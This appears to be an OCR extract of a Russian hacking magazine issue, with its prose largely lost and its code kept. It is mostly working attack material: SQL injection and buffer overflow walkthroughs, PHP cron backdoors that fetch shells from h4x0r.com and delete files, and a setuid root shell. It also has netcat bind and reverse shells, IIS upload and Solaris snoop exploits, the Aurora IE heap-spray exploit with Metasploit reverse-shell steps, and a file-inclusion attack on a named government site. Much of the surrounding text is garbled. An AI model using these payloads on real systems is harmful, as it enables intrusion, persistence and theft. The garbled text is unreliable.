keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:aad2bbbe2b51404e
eaad3b435b514ee:...
Guest:501:aad3b435baaaaeaa3b435d3b
435b514aae04ee:...
HelpAssistant:1000:cefa2909bd5b0f4
602168042f2f646:...

. , , l0phtcrack
(www.l0phtcrack.com).

033

PC_ZONE




, .

MSDOS WOWEXEC ,
,
.. NtVdmControl() NTVDM. Windows
,
HKEY_LOCAL_MACHINE\
SYSTEM\CurrentControlSet\Control\WOW
- .
16- .
GPEDIT.MSC,
/ /
Windows/

16- .


NT AUTHORITY\SYSTEM

16-

HTTP://WWW
links

:
archives.
neohapsis.com/
archives/fulldisclosure/
2010-01/0346.html.

Microsoft: support.
microsoft.com/
kb/979682.

WARNING

info
.




.

034

,
. rev2self , -
NT AUTHORITY\SYSTEM: ,
,
getsystem. , , , , .
ps :
meterpreter > ps
Process list
============
PID Name Arch User Path
--- ---- ---- ---- ---0 [System Process]
4 System x86 NT AUTHORITY\SYSTEM
370 smss.exe x86 NT AUTHORITY\SYSTEM \
SystemRoot\System32\smss.exe
...
1558 explorer.exe x86 WINXPSP3\user C:\
WINDOWS\Explorer.EXE
...

, explorer.exe
PID=1560. ,
, ,
steal_token. PID :
meterpreter > steal_token 1558
Stolen token with username: WINXPSP3\user
meterpreter > getuid
Server username: WINXPSP3\user

Server username,
.

,
.
#GP ( nt!KiTrap).
-
. , BIOS',
32- x86-
16- .
16- (%windir% \
twunk_16.exe), NtVdmControl(),
Windows Virtual DOS Machine (aka
NTVDM),
#GP .
,
,
32- . 64-
16- .

?
Microsoft ,
.
.
, , , .
,
:)? z
X 03 /134/ 10

STEP TWITTER.COM/STEPAH


, 8 2005 ,
Google
Maps. , -
, .
,
, , ,
. :
API ,
,
, ,

Streets View.


360 .
, Google
, , ,
,
:). ...
,
- . ,

!-, Bird's Eye Microsoft Bing (www.bing.com/maps).
, ?
,

, , ,
, . Bird's Eye ( ) .
, 45
,
,

X 03 /134/ 10

,
, .
,
, ,
SimCity. ,
-!
- ,
GoogleStreet's,

DualMaps (www.mapchannels.
com/dualmaps.aspx). , API bing.com/
developers. ,
, ,
80 ,
Pictometry,
.

-, ,
SAS. (sasgis.
ru/sasplaneta),
, ,
Bing' .
,
Google, Yahoo (

Eniro: www.eniro.com). !
,
Googlebuildingmaker (sketchup.google.
com/3dwarehouse/buildingmaker),

3D- . ,
3D-?
!
,
,

. Google, ,
,
, 4-
, 3D-
(
). (,
) ,
GoogleEarth (earth.
google.com/intl/ru) .
.
, GoogleMaps, 5
, .
- Silverlight,
VirtualEarth,
:). z

035


Spyder spyder@antichat.net
komarov@itdefence.ru

Easy Hack
1

:
SQL-INJECTION

:
. , , ,
. , :
<?php
if(isset($_GET['id']) && $_GET['id']!=''){
$replaced = preg_replace(/,/,'',$_GET);
....
- $replaced

? union
select, 2- . , ,
. ,
substring(), mid(), ExtractValue(),
Qwazara
. ? SQL-, LIKE.
:
id=1 and version() like '4%'--

, , , 4*. :
id=1 and version() like '5%'--

, ,
id=1 and 1=1--

, . ,
, , .
information_schema.tables;
, ,
:
id=1 and (select 1 from information_schema.columns where
column_name like '%pass%' and table_name like 'u%')--

%pass% ,
table_name. ,
:
id=1 and (select 1 from information_schema.columns where
column_name like '%pass%' and table_name like 'us%')--

. , users
username, password,id. :
id=1 and (select 1 from users where id=1 and password like
'q%')--

. %
LIKE , q 1
.

:

BUFFER OVERFLOW

:
, , -
, .
, . ,
:
#include "stdio.h"
void return_input (char *s) {
char array[12];
strcpy(array,s);
printf("%s\n", array);
}
char text () {
printf("Example\n");
}
main ( int argc, char *argv[] ) {

036

text();
return_input(argv[1]);
return 0;
}

array 12
, . 30 :
spyder@l33t:~/c> ./bof AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAA
Example
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(core dumped)

:
spyder@l33t:~/c> gdb bof core
............................
Core was generated by './bof AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA'.
X 03 /134/ 10

pcap-

Bindshell Windows
Vista/7

Program terminated with signal 11, Segmentation fault.


#0 0x41414141 in ?? ()

0x41 (A) ebp eip. eip , ,


. eip .
text() .
:
spyder@l33t:~/c> gdb bof
(gdb) disas main
Dump of assembler code for function main:
0x0804848d <main+0>: push %ebp
0x0804848e <main+1>: mov %esp,%ebp
0x08048490 <main+3>: and $0xfffffff0,%esp
0x08048493 <main+6>: sub $0x10,%esp
0x08048496 <main+9>: call 0x8048479 <text>
0x0804849b <main+14>: mov 0xc(%ebp),%eax
0x0804849e <main+17>: add $0x4,%eax
0x080484a1 <main+20>: mov (%eax),%eax
0x080484a3 <main+22>: mov %eax,(%esp)
0x080484a6 <main+25>: call 0x8048454 <return_input>
0x080484ab <main+30>: mov $0x0,%eax
0x080484b0 <main+35>: leave
0x080484b1 <main+36>: ret

text
0x08048496 <main+9>: call 0x8048479 <text>
0x08048496.
0x08048496.
12 , , 4
, ebp, , , 4 ,
eip. gcc ,
6 . :

:
,

:
sla.ckers.org
Paic , ,
NOT NULL. , ,
:
id=1 and (select * from users) = (1)

MySQL Operand should contain 7 column(s).


, users 7 . :
X 03 /134/ 10

char stuff[]= AAAAAAAAAAAAAAAAAAAAAAAA\x96\x84\x04\x08;


execlp("./bof","./bof",&stuff,NULL);
}

LIFO (Last In First Out, ),


. :
spyder@l33t:~/c> ./eip
Example
AAAAAAAAAAAAAAAAAAAAAAAA??
Example

, text() ,
, .

main () {

IP ,

id=1 and (1,2,3,4,5,6,7) = (select * from users union select


1,2,3,4,5,6,7 limit 1)

. ,
.
%0 , NOT NULL,
. :
id=1 and (1,2,3,4,5,6,7) =
(select * from users union select 1%0,2,3,4,5,6,7
limit 1)

Column id cannot be null.

037

:
, root.
- ,
PHP-. . :

system()
passthru()
exec()
shell_exec()
pcntl_exec()
eval()

: OpenSSH .
OpenSSH ShadOS, , , ,
. suid.c, :

,
:
assert()
preg_replace() c e
$a($b)
usort()

, -.
- , joomla, wordpress vbulletin,
. PHP .
, images ,
.jpg. .gif-!
.htaccess :

#include <stdio.h>
int main(int argc, char **argv){
system(argv[1]);
}

gcc suid.c -o suid. ( )


suid-. - , .
system().
suid-:
./suid id
uid=30(www) gid=30(www)

- :
chown 0:0 suid;chmod 4755 suid

AddType application/x-httpd-php .gif

www:
.gif- -.
, ?
/etc/shadow,
. ,
, ,
.

: SWEB
PETERHOST

:
, PHP- SQL-. .

038

./suid id
uid=30(www) gid=30(www) egid=0(root)

uid=30, !
/usr/bin.

1) union select.
Sweb $_GET-; POST, .
Peterhost $_GET, $_POST ,
; union select
, ,
. :
X 03 /134/ 10

reverse-shell Windows Vista/7

%09
%0a
%0b
%0c
%0d

:
, , //
. .
1) .
( cronshell.php) :
<?php
$file = /home/user/www/shell.php;
if(file_exists($file) == false) {
copy('http://www.h4x0r.com/shell.txt', $file);
}
?>

, , ,
. , , allow_url_fopen
On, system() wget.
2) .
index.php, . index.php
; , .
cronframe.php:
<?php
$frame = ' ';
$frame = preg_quote($file,'/');
$file = file_get_contents('/home/user/www/index.php');
preg_match($frame,$result,$file); //
if ($result == '') { //
system('rm /home/user/www/index.php); //
copy('http://www.h4x0r.com/index.txt', '/home/user/www/
index.php'); //
}
?>

3) .
X 03 /134/ 10

2) order by.
order by group by,
, , .
, oRdEr bY,
.
3) PHP-injection.
,
, /etc/passwd,
, /etc/
hosts.

<?php
$testfile = '/home/user/www/dors/sitemap.html'; //

if(file_exists($testfile) == false) { //
, ...
system('rm -rf /home/user/www/dors;mkdir /home/user/www/
dors');
copy('http://www.h4x0r.com/dors.tgz',
'/home/user/www/dors/'); //
system('tar xzf /home/user/www/dors/dors.tgz');
//
}
?>

, .
/home/user/ test:
SHELL=/bin/bash
MAILTO=user
0-59 * * * * /home/user/cron.php

: , - , , , ,
, /home/user/cron.php .
, :
crontab /home/user/test

! /var/spool/cron user
:
# DO NOT EDIT THIS FILE edit the master and reinstall.
# (/home/user/test installed on Mon Mar 29 02:31:34 2004)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37
vixie Exp $)
SHELL=/bin/bash
MAILTO=user
0-59 * * * * /home/user/cron.php

/home/user/cron.php .

039

, ,

FTP-
1. - .pcap:
tcpdump -w test.pcap -i eth1 tcp port 6881 or udp \( 33210 or
33220 \)

:
NMAP, ,
. ,
.
.

: , FTP

:
,
.
!
, FTPXerox v1.0 (members.fortunecity.com/sektorsecurity/

:
NETCAT VISTA

:
, , .
powershell.exe,
cmd.exe , :).
BindShell:
nc -l -e powershell.exe -t -p 666
telnet localhost 666
ReverseShell:
nc -l -p 666
nc -e powershell.exe localhost 666

PowerShell.
, netcat,
:
function Trace-Port([int]$port=23,
[string]$IPAdress="127.0.0.1", [switch]$Echo=$false){
$listener = new-object System.Net.Sockets.
TcpListener([System.Net.IPAddress]::Parse($IPAdress), $port)
$listener.start()
[byte[]]$bytes = 0..255|%{0}
write-host "Waiting for a connection on port $port..."
$client = $listener.AcceptTcpClient()
write-host "Connected from $($client.Client.

040

2. rumint (rumint.org),

.

projects/ftpxerox.html). , - ,
.
, . ,
.
,
.

FTP. - .

RemoteEndPoint)"
$stream = $client.GetStream()
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$bytes[0..($i-1)]|%{$_}
if ($Echo){$stream.Write($bytes,0,$i)}
}
$client.Close()
$listener.Stop()
write-host "Connection closed."
}

:
PS> Trace-Port -ip 192.168.1.99 -port 333
Waiting for a connection on port 333...
Now script waiting for connection on port 333. I will connect to
this port using telnet.exe, and then write word "Test" into it:
Connected from 192.168.1.99:61829
84
101
115
116
13
10
Connection closed.

, test-, . z
X 03 /134/ 10


KOMAROV@ITDEFENCE.RU / IT DEFENCE.RU

, , ,
, . , , ,
- , .
. ,
.

CLIENTLESS VPN SSL

01

CISCO VPN SSL

BRIEF CISCO VPN SSL CISCO ASA CISCO, . VPN-,



.
EXPLOIT CISCO VPN Clientless ,
VPN
. . CISCO
, ,
, ,
.
,
/Intranet-, . ,
http://intranet. ,
:
1) ROT13 uggc://vagenarg.
2) ASCII- HEX
756767633a2f2f766167656e617267.
3) https://[CISCOVPNSSL]/+CSCO+0075676
7633a2f2f766167656e617267++.
! :
#!/bin/bash
echo -n "write URL:"
read a
b=`echo -n $a | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m]
[N-Z][A-M]' | od
-tx1 | cut -c8- | sed 's/ //g'` | paste -s -d '';
echo -n "URL "

042

CLIENTLESS CISCO VPN-

echo -n "https://[CISCOVPNSSL]/+CSCO+00";; echo -n $b;


echo -n "++";
echo "";

SOLUTION ACL- (webtype/


filter), Cisco Understanding Features
NotSupported in Clientless SSL VPN.
TARGETS Cisco ASA <= 8.x.

02


MICROSOFT IIS

BRIEF WEB- Microsoft.


ASP-
,
, . .
EXPLOIT IIS :
.asp;.gif, .asp;.jpg, .asp;.exe.
, ; .
, , , ,
(, ), WEB
X 03 /134/ 10

SHELLCODE'A ,
ASCII

- . Backtrack
,
(backtrack.it/~emgent/exploits/
IIS-asp.py):

XDOTOOL ,
. ,

./IIS-asp.py <image.jpg> < shellcode>

, - 0 shell_bind_
tcp, 1 meterpreter_bind_tcp, 2 vncinject_bind_tcp, ,
payloads Metasploit.
root@andrej:/tmp# ./IIS-asp.py image.jpg 0

image.asp;.jpg,
WEB-. , .
, , ,
(, images, avatars, uploads).
:
http://127.0.0.1/images/image.asp;.jpg
root@andrej:/tmp# nc -vv 10.12.6.6 31337
# Zerbion [10.12.6.6] 31337 (?) open
#
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# c:\windows\system32\inetsrv>whoami
> nt authority\network service

03


BLENDER

BRIEF Blender (blender.org) 3D- ,


, , !
,
. ,
( .blend) .
EXPLOIT Blender (Text Editor),
, New. , Python, :
import os
os.system("calc.exe")

Text Name (TX:Text.001) TX:myscript. Buttons


Window, (panel) Script,
, enable script links . New,
(myscript). OnLoad.
, User Preferences File Save.

TARGETS Blender 2.49b, Blender 2.40, Blender 2.35a, Blender 2.34.

SOLUTION .

SOLUTION ,
.
.blend- SDNA Scriptlink (http://www.

TARGETS Microsoft Internet Information Services (IIS) 5.x/6.x.


X 03 /134/ 10

043

,
- !

atmind.nl/blender/blender-sdna.html#struct:ScriptLink),
.

04

LINUX- SKYPE

BRIEF
Skype ( ). , ,
(design error). Linux, GUI-
QT (qt.nokia.com/products).
EXPLOIT
1. pseudo-XSS.
HTML - , . , ,

, , . "><h1><" ,
, . ? ,
, , , . ,
. ,
XSS, , ,
,
, , phishing-:
akep.ru">! .>


google.it, !
, .
, XSS-.
2. Denial Of Service 100%. xdotool (semicomplete.com/projects/xdotool)
.

044

Linux/FreeBSD, , , - .
, Windows (Automize).
Skype, xdotool ,
, :
sleep 5 && xdotool type "`perl -e "print 'S 'x44801"`" &&
xdotool key Return
sleep 5 && xdotool type 's/../' && xdotool type "`perl -e
"print 'S 'x44801"`" && xdotool type '/' && xdotool key
Return

, 0x44801 .
-
. .
SMS , 89601-.

TARGETS
<=2.1 Beta.
SOLUTION
.

05


SUN SOLARIS (SNOOP)

BRIEF snoop (docs.sun.com/app/docs/doc/819-2240/snoop1m?a=view) SUN Solaris. Snoop


, tcpdump/ethereal.
, , , ,
X 03 /134/ 10

WEB-
SOLARIS SNOOP !


. Wireshark:
CVE-2006-3627 GSM BSSMAP
CVE-2009-3243 TLS
CVE-2009-3550 DCERPC-
CVE-2009-3829 wiretap/
erf.c

, . - ,
,
. SMB-
(src/cmd/cmd-inet/usr.sbin/snoop/snoop_smb.c).
:
06
07
08
09
10
11
12
13

static void
interpret_negprot(int flags, uchar_t *data,
int len, char *xtra)
{
int length;
int bytecount;
char dialect[256];
...
protodata = (uchar_t *)data +
sizeof (struct smb);

X 03 /134/ 10

14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

protodata++;

/* skip wordcount */

if (smbdata->flags & SERVER_RESPONSE) {


...
} else {
/*
* request packet:
* short bytecount;
* struct { char fmt; char name[]; } dialects
*/
bytecount = get2(protodata);
protodata += 2;
if (flags & F_SUM) {
while (bytecount > 1) {
length = sprintf(dialect,
(char *)protodata+1);
protodata += (length+2);
bytecount -= (length+2);
}

16, , , SMB ,
else (get2()).

(27), F_SUM.
(dialect) sprintf.
256 ,
.

045

, !

EXPLOIT milw0rm.org/
exploits/6328.
:
attack:/exploits# ./hoagie_snoop -t 192.168.0.1
* [*] attacking 'SunOS opensolaris 5.11 snv_86 i86pc i386
i86pc' on '192.168.0.1' ...
* [*] execute 'uname -a > /tmp/.patch.your.system.txt'
now ...
* [*] done
attack:/exploits#

, :
admin@opensolaris:~# snoop port 445
* Using device pcn0 (promiscuous mode)
* sh[1]: i??SMBr: not found [No such file or directory]
* WARNING: received signal 11 from packet 1
admin@opensolaris:~# cat /tmp/.patch.your.system.txt
* SunOS opensolaris 5.11 snv_86 i86pc i386 i86pc Solaris
admin@opensolaris:~#

046
46

!
, . :
01 s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
02 if (s == -1) {
03
printf("[*] failed to create raw socket\n");
04 } else {
05
sin.sin_family = AF_INET;
06
sin.sin_port = htons(port);
07
sin.sin_addr.s_addr = inet_addr(target);
08
09
if (!command) {
10
command = "uname -a > /tmp/.patch.your.system.txt";
11
}
12
13
printf("[*] attacking '%s' on '%s' ...\n",
targets[idx].description, target);


, , snprintf:
X 03 /134/ 10

4
5

buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;

1
2
3
4
5

/*
buffer[i++] =
buffer[i++] =
buffer[i++] =
buffer[i++] =

length */
SMB_HEADER_FILLER;
SMB_HEADER_FILLER;
SMB_HEADER_FILLER;
SMB_HEADER_FILLER;

/* 4 */ ( , GCC )
2
3
4
5

buffer[i++]
buffer[i++]
buffer[i++]
buffer[i++]

=
=
=
=

SMB_HEADER_FILLER;
SMB_HEADER_FILLER;
SMB_HEADER_FILLER;
SMB_HEADER_FILLER;

1
2
3
4
5

/* ebp */
buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;

1
2
3
4
5

/* (system())*/
buffer[i++] = targets[idx].address & 0xff;
buffer[i++] = (targets[idx].address >> 8) & 0xff;
buffer[i++] = (targets[idx].address >> 16) & 0xff;
buffer[i++] = (targets[idx].address >> 24) & 0xff;

, :
01
02
03

printf("[*] execute '%s' now ...\n", command);


send_smb_packet(s, &sin, SMB_COMMAND_TRIGGER,
buffer);

04
05
printf("[*] done\n");
06
07
close(s);
08
}
09
10
return 0;
11 }

SMB 0X72

snprintf(buffer, sizeof(buffer), ";%s;",


command);

2
3
/* char dialect[256] */
4
for (i = strlen(buffer); i < 256; i++) { buffer[i]
= SMB_HEADER_FILLER; }

dialect .
EIP :

1
2
3

/* bytecount*/
buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;

X 03 /134/ 10

TARGETS
Sun Solaris 8/9/10.
OpenSolaris < snv_96.
SOLUTION

snprintf:
1
2
3
4
5
6
7
8
9

+
+
+
+

while (bytecount > 1)


{
length = sprintf(dialect, (char *)protodata+1);
length = snprintf(dialect, sizeof (dialect),
"%s", (char *)protodata+1);
protodata += (length+2);
if (protodata >= data+len)
break;
bytecount -= (length+2);
}

047


Step step@glc.ru

GOOGLE
.

GOOGLE, MCAFEE, ADOBE .
:). ,
, .
INTERNET EXPLORER,
, .
048

X 03 /134/ 10


,
.
,
(-), .
- IE,
Heap Spraying.
.

HEAP SPRAYING

, ,
Heap Spraying.
.
,
( IE)
- ,
.
0x7fffffff,

,
. Heap Spraying.
, , -
(- Heap), ?
.
(
, , ,
),
: . , ,
,
, ,
.
,
.
, ,
, -:

.
-, - ?
. , X 03 /134/ 10

NOP-,
, -.

NOP',
NOP ,
,
. NOP' -,
!
Heap
Spraying. :
? ,
,
.
JS-,
. ,
, ,

.
, ,
, Aurora,

.

JavaScript, , ,
. , ,
, JS-
.
:
<script>
var c = document
var b = "60 105 ... 62 14 10 "
var ss = b.split(" ");
var a = "a a a ... | } ~ "
var s=a.split(" ");
s[32]=" "
cc = ""
for(i=0;i<ss.length-1;i++) cc +=
s[ss[i].valueOf()-i%2];
var d = c.write
d(cc)
</script>


.
JS-
b.
,

,
a. , :
<html>
<script>
var sc = unescape("%u9090 [...]
6%ubfa8%u00d8");
var sss = Array(826, 679, [...]
413, 875);
var arr = new Array;
for (var i = 0; i < sss.length;
i ++ )
{
arr[i] = String.
fromCharCode(sss[i]/7);
}
var cc=arr.toString();cc=cc.
replace(/ ,/ g, "");
cc = cc.replace(/@/g, ",");
eval(cc);
var x1 = new Array();
for (i = 0; i < 200; i ++ ){
x1[i] = document.
createElement("COMMENT");
x1[i].data = "abc";
};
var e1 = null;
function ev1(evt){
e1 = document.
createEventObject(evt);
document.getElementById("sp1").
innerHTML = "";
window.setInterval(ev2, 50);
}
function ev2(){
p = "\u0c0d\ [...] \u0c0d";
for (i = 0; i < x1.length; i ++
)
{
x1[i].data = p;
};
var t = e1.srcElement;

049

IE ,
ECX
x[i] = n + sc;
}

INTERNET EXPLORER
}
</script>
<span id="sp1"><IMG SRC="aaa.gif"
onload="ev1(event)"></span>
</body></html>

HTTP://WWW
links

NOPslide:
www.phreedom.
org/solar/honeynet/
scan20/scan20.html.
Microsoft:
www.microsoft.com/
technet/security/
bulletin/MS10-002.
mspx.

WARNING

info
.


.
.

050

, Heap Spraying,
. n,
NOP- 0D 0C (, ,
,
). , NOP- n ... - sc.
,
, Heap
Spraying! , .
, , ,
,
. -
Internet Explorer, .

:
sc, - . ,
.

, sss.
var sss = Array(826, 679, [...] 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ )
{
arr[i] = String.fromCharCode(sss[i]/7);
}
var cc=arr.toString();cc=cc.replace(/ ,/ g,
"");
cc = cc.replace(/@/g, ",");
eval(cc);


: sss sss[i]/7,
fromCharCode
Unicode-. cc,
,
eval(cc) :
var n = unescape("%u0c0d%u0c0d");
while (n.length <= 524288)n += n;
n = n.substring(0, 524269 sc.length);
var x = new Array();
for (var i = 0; i < 200; i ++ ){

var x1 = new Array();


for (i = 0; i < 200; i ++ ){
x1[i] = document.createElement("COMMENT");
x1[i].data = "abc";
};
var e1 = null;

200 COMMENT,
.data abc.
, . ,
,

:
<span id="sp1"><IMG SRC="aaa.gif"
onload="ev1(event)"></span>

HTML- <span>,
<img>, aaa.gif (
). , , onload (,

),
ev1. , :
function ev1(evt){
e1 = document.createEventObject(evt);
document.getElementById("sp1").innerHTML
= "";
window.setInterval(ev2, 50);
}

-
event, X 03 /134/ 10

PYTHON !

!
onload <img>. :
innerHTML <span>.
<img>, ,
.
, ev2() 50 .
function ev2(){
p = "\u0c0d\ [...] \u0c0d";
for (i = 0; i < x1.length; i ++ )
{
x1[i].data = p;
};
var t = e1.srcElement;
}
</script>

, ! ,
x1 ,
COMMENT, . .data. p,
x1, ,
Heap Spraying.
? ! , ,
.data, ,
, . , ? ( !) <img>,
. , <img>
, , , .

(HEAP)
.
NOP No OPeration,
, .

, ,
. .
ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) .
,
,
.

X 03 /134/ 10

.data ,
, - (heap').
? , <img>! , <img> , .
, 0x0C 0x0D? :
0x0C0D0C0D,
-,
Heap Spraying'. , ,
. e1:
var t = e1.srcElement;
srcElement ,
e1. <img>,
span innerHTML. IE
- ,
. ,
0x0C0D0C0D, , , Heap Spraying'. :
-, .

GOOGLE?

Internet Explorer,
. (- Google
..), . -,
, Hex-Rays.
Svchost.exe .
HKEY_LOCAL_MACHINE\
System\CurrentControlSet\Services\, HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\
CurrentVersion\Svchost. SysIns.
%System%\rasmon.dll
serviceDLL , :
C:\Windows\System32\svchost.exe k SysIns
rasmon.dll . ,
,
, .
.
.
RaS[4 ] (, RaSxake),
serviceDLL netsvcs.
svchost.
W32.Downadup, -

051

METASPLOIT'
.
, ,
.
, , ,
.
-

, , , ,

.


Wepawet (wepawet.
iseclab.org).
Metasploit,

, ,
.
Metasploit
(www.metasploit.com/framework/download)
-
. ,

msfconsole,
.
ie_aurora,
IE, :

052

1. :
msf > use exploit/windows/
browser/ie_aurora

2. -, ..
,

.
backconnect (
):
msf exploit(ie_aurora) > set
PAYLOAD windows/meterpreter/
reverse_tcp

3. backconnect' ,

:
msf exploit(ie_aurora) > set
LHOST _IP

4. URIPATH
, HTML- (
):
msf exploit(ie_aurora) > set URIPATH /
5. , , :
msf exploit(ie_aurora) > exploit



IP-:
[*] Exploit running as background
job.
[*] Started reverse handler on
port 4444
[*] Local IP:
http://192.168.0.23:8080/
[*] Server started.

,
Internet Explorer 6 ( Windows
XP SP3)
, Local IP
(http://192.168.0.23:8080). ,
(backconnect'):
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1
opened (192.168.0.23:4444 ->
192.168.0.97:1514)

: . ,
,
, , :
msf exploit(ie_aurora) > sessions
-i 1
[*] Starting interaction with
1...
X 03 /134/ 10

HIGH ADRESS TO 0X7FFFFFFF

HIGH ADRESS TO 0X7FFFFFFF

OTHER STRUCTURES

OTHER STRUCTURES
JUMP HERE
3C0DFF7D

JUMP HERE
3C0DFF7D

Injected Heap
INVALID MEMORY

} NOP + SHELLCODE

Injected Heap
Injected Heap
Injected Heap

96AB0000

96AB0000
HEAP
OTHER STRUCTURES

HEAP SPRAY
LOW ADRESS TO 0X00000000

Injected Heapython'
Heap
OTHER STRUCTURES

HEAP SPRAY
LOW ADRESS TO 0X00000000

HEAP SPRAYING
NOP' + -
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version
5.1.2600]
(C) Copyright 1985-2001 Microsoft
Corp.
C:\Documents and Settings\Testlab\
Desktop>

! ,

Python' (praetorianprefect.com/wp-content/
uploads/2010/01/ie_aurora.py_.txt),
-
HTML : python ie_aurora.py [
].
-, (calc.exe).

IE6?

Internet Explorer.

IE8 . ,
Internet Explorer 8 ( , ) DEP (Data Execution Prevention)

. ,
,
.
X 03 /134/ 10


WEPAWET

DEP
,

. , security- Vupen
(www.vupen.com/exploits) ,
DEP IE8,
.
Microsoft, proof-of-concept , , Windows Vista
-

Address
Space Layout Randomization (ASLR).
: ? Aurora


, .


.
Hydraq. z

053


ARTEMBARANOV@YANDEX.RU


TDL3

, , , TDL3
TDSS.
,
. ,
TDL3,
.

rootkit.com diablonova
(rootkit.com/blog.php?newsid=970)

TDL, , ,
.
- ,
.
,
, -
; atapi.sys, disk.sys.
,
.
, .
atapi.sys,

. ,

.
IRP - atapi
: -
.

054

AV ,
,

. . -
DrWeb
Backdoor.Tdss.565 (aka TDL3) (drweb.
com/static/BackDoor.Tdss.565_(aka%20TDL3).
pdf), TDL3 .
.
thug4lif3 rootkit.com (rootkit.com/newsread.
php?newsid=979),
.
Rustock.C,
, TDL3

,

. TDL3
, ,
.

;
offensivecomputing.net malwarebytes.org,
, ,
.


, .
,
, , .
,
Windows XP SP3, , Windbg, , IDA .
non-debug , . ,
, debug .
,
debug out This is your life,
and it's ending one minute at a time.
DrWeb.
X 03 /134/ 10

-, Disable
acceleration for binary translation .
, tdss.565
.
, , ,
- - (
atapi.sys). , , !devstack \device\
harddisk0\dr0.
-.
- (
,
.reload atapi.sys).
:
kd> u f9756b3a l3
atapi!PortPassThroughZeroUnusedBuffer
s+0x34:
f9756b3a
mov eax,dword ptr ds:[FFDF0308h]
f9756b3f
jmp dword ptr [eax+0FCh]
f9756b45
add byte ptr [eax],al

, : TDL3

(,
IRP - ).

,
0xFFDF0308. -, ,
KUSER_SHARED_DATA, ,
(, ) . ,
.
.
struct _TAIL_PARAM_BLOCK
{
PVOID pTailInMem; //+0,

PVOID KernelBaseAddress; //+4,

PVOID MountedVFSDeviceObject; //
+8, atapi,

VFS
PVOID Unknown1; //+C
X 03 /134/ 10

ULONG TailDiskOffsLow;
//+10, ULONGLONG,

ULONG TailDiskOffsHigh; //+14
ULONG numOfValidSectorInHideArea;
//+18,
FAST_MUTEX FastMutex;//+1C
ULONG TailStartDiskSector;//+3C,
LBA
ULONG HideAreaStartSector;//+40,
LBA
UCHAR szBotId[36]; //+44,

ULONG Unknown2; //+68
ULONG Unknown3; //+6C
ULONG Unknown4; //+70
ULONG Unknown5; //+74
ULONG Unknown6; //+78
ULONG Unknown7; //+7C
ULONG Unknown8; //+80
ULONG Unknown9; //+84
ULONG Unknown10;//+88
ULONG OrigAtapiFuncs[0x1C];
//+8C, -
PVOID RootkitDispatchFunc;
//+FC, -

PVOID AtapiDriverObject; //+100


PVOID AtapiBootRootkitDevObj;
// +104, -
- ,
ULONG SectorSize; //+108
PVOID pKernel32_LoadLibraryExA;

//+10c,
ULONG cEntryInHideAreaTable;
//+110,

struct
{
ULONG SectorStart;
ULONG OffsFromSector;
ULONG RestoreDataSize;
PVOID pOrigData;
ULONG unknown;
}
HideAreaEntry[7]; //+114
ULONG unknown11[45];//+1A0
WCHAR DirSignature[9];//+254,

WCHAR DirFullPath[30];//+266,

...
}

, :
,
, ,
-.
.

IDA.
. -, .
TDL3,

055

DEVSTACK, - \DRIVER\
ATAPI DISK.SYS.

- ,
, ATAPI
, .
RootkitDispatchFunc
( 818e2e31) TDL3.
0x5E00
(
), ,
.writemem D:\1.bin 818df000
l5e00. :
- atapi.sys,
OrigAtapiFuncs
, , DiskExplorer.
m,
;
m poi(FFDF0308)+8C l70 81957548+38,
81957548 atapi.
atapi.sys
. , -

TDL3

,
. .
TDL3

056

DLL
EXPLORER
PEB
,
TailStartDiskSector.
, atapi.sys. -

,
,
.
,
, .
,
-
IRP . dd poi(FFDF0308)+fc
l1
, P.

VFS

, , ,
atapi,
IRP_MJ_INTERNAL_
DEVICE_CONTROL (aka IRP_MJ_SCSI).
create/
close ,
, FSD,

.
( )
/ PnP
. atapi.sys

create/close ,
STATUS_SUCCESS.
,
( ) ,
, , dll,

(
)
,
. ,
,
\Device\Ide\IdePortX, /
,
,
. , . VFS
white paper DrWeb,
, .
,
0x254
(DirSignature).
(DirFullPath) __ + _ (
\Device\Ide\IdePort1\
riyuicvp).
,
, Win32 API \Device\Ide\
IdePort1\riyuicvp\tdlwsp.dll. , , ,
dll,
PEB, .

, . ,
- ,
- FILE_DEVICE_
CONTROLLER, FS.

,
, -,
( HideAreaEntry).

callback- ,
,
.
,


.
(
). ,
,
. X 03 /134/ 10

0X384 ,

.
DriverStartIo DRIVER_OBJECT. , IRP-,
. -
IoStartPacket,
StartIo,
.

,

,


8198ACA2. 8198ACA28a243384=F774791E. <Alt-B>
,
1E 79 74 F7.
IRP ,
. : ,
atapi
VFS. ,
,

, .

,
,
.


, ,
. z

STARTIO -,
.
TDSS 3.20

TDL3
, . , ,
. -
atapi , fake-
- ,
, .

X 03 /134/ 10

057

GOV


. :
,
, .
, .


.
, .
,
, ,

. ,
,
, ,
(
)? ? ,
,
? :
, .

, , - .
Disturbed Perfect Insanity .

, 15400000 .

058

.
, The official site
2004, .
, , .
http://site/dir. ,
mode_rewrite,
: http://www.mon.gov.ua/main.
php?query=zno. ,
query query[],
- : ,
. ,
. ,
,
RFI. . ,

,
phpinfo. ,
Local File Inclusion,
-
.
:
http://www.mon.gov.ua/main.
php?query=main.php%00.

,
, . , ,
, .
LFI, Looped DoS.
.
,
. . ,
, ../?

FORBBIDEN.

,
/
proc/self/environ! POST-
User-Agent .
: http://www.mon.gov.ua/main.
php?query=../../../proc/self/environ%00. ,
. !
